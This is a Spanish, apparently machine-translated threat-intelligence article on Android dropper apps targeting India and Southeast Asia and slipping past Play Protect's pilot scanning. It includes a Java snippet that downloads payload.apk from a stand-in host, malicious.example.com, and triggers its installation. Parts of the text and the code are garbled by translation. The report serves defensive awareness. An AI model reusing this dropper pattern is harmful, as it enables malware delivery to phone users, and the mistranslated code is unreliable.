Los goteros de Android han evolucionado de los instaladores de nicho para troyanos bancarios de peso pesado en los marcos de entrega universales, capaces de implementar incluso los robos de spyware rudimentarios o robos de SMS.
Inicialmente, los goteros sirvieron a familias de malware bancarias que requirieron permisos de accesibilidad elevados para la cosecha de credenciales.
Estas pequeñas aplicaciones parecían inocuas a primera vista, a menudo disfrazadas de aplicaciones de servicios públicos o gubernamentales en regiones de alto riesgo. Una vez instalados, obtendrían su verdadera carga útil, solicitarían permisos potentes y activarían sus rutinas maliciosas.
A medida que los defensores fortalecieron el escaneo de preinstalación, los actores de amenaza comenzaron a repensar su enfoque.
En los últimos meses, ha surgido un aumento en las campañas basadas en cuentagotas dirigidas a Asia, particularmente India y el sudeste asiático. En lugar de confiar únicamente en ratas complejas o troyanos financieros, los adversarios ahora encapsulan las cargas útiles simples dentro de los capataces.
Esta estrategia explota una brecha crítica en el programa piloto de Google Play Protect, que realiza un permiso de preinstalación y una exploración API, pero permite que la instalación continúe si el usuario confirma.
Los analistas de amenazas de tela señalaron que este pivote no solo evita las defensas iniciales sino también las operaciones de prueba futura, lo que permite swaps de carga útil rápidos sin modificar el cuentagotas en sí.
Al incrustar el código minimalista de la etapa uno que no tiene permisos de alto riesgo, los droppers modernos pasan a través de inspecciones del programa piloto sin detectar.
RecompensaDropMiner (Fuente – Fabric de amenaza)
Investigadores de telas de amenazas identificado Variantes como RecompensarDropMiner.b, despojadas de su Monero Miner y Spyware Spyware, conservando solo la lógica del cuentagotas para reducir el ruido y evadir la detección.
Aplicaciones que solicitan permisos maliciosos bloqueados (Fuente – Fabric de amenaza)
Una vez que un usuario acepta el aviso de “actualización” benigno, una rutina oculta obtiene o descifra el APK secundario, solicitando dinámicamente los permisos de recibo_sms o bind_notification solo al iniciar el primer lanzamiento de la carga útil verdadera.
El impacto de estas campañas es doble: los defensores pierden la visibilidad temprana de la actividad maliciosa, y los operadores mantienen un punto de apoyo estable capaz de entregar cargas útiles arbitrarias.
Esta modularidad permite a los actores de amenaza reaccionar rápidamente a las actualizaciones de seguridad o los derribos de aplicación de la ley cargando nuevas cargas útiles detrás de un capentgan sin cambios alojado en su infraestructura de comando y control.
Mecanismo de infección y tácticas de evasión
La profundización del mecanismo de infección revela un proceso de varias etapas diseñado para el sigilo y la resistencia. El manifiesto del gotero declara solo Internet y request_install_packages permisos, evitando las banderas en el escaneo piloto de Play Protect.
Tras la interacción del usuario con la interfaz “Actualización”, el gotero inicia una solicitud HTTPS a un servidor remoto:-
String PayLoadURL = “https://malicious.example.com/payload.apk”; OKHTTPClient Client = new OKHTTPClient (); Solicitud solicitud = nueva request.builder (). Url (PayloadUrl) .Build (); Respuesta de respuesta = Client.newCall (solicitud) .execute (); if (respuesta.issuccessful ()) {archivo apk = nuevo archivo (getExternalFilesDir (null), “payload.apk”); try (FileOutputStream fos = new FileOutputStream (apk)) {fos.write (respuesta.body (). bytes ()); } Intento installIntent = new Intent (intent.action_view); installIntent.SetDataAndType (FileProvider.getUriforFile (this, getPackageName ()+”. Provider”, APK), “Aplicación/VND.Android.Package-Archive”); installIntent.AddFlags (intent.flag_grant_read_uri_permission); startActivity (installIntent); }
Este fragmento ejemplifica el uso de API estándar del cuentagotas para descargar y instalar la instalación de la carga útil sin activar alertas de alto permiso de alto riesgo.
Después de la instalación, las solicitudes de actividad del lanzador de la carga útil reciben_sms y bind_notification, momento en el cual la protección del juego puede advertir al usuario, pero a menudo es demasiado tarde, ya que la confianza en la transferencia inicial de cuentagotas se extiende a la aplicación recién instalada.
Estas tácticas de evasión resaltan una necesidad apremiante de los defensores para correlacionar los escaneos previos y posteriores a la instalación y monitorear continuamente el comportamiento de la aplicación cargada de lateral.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
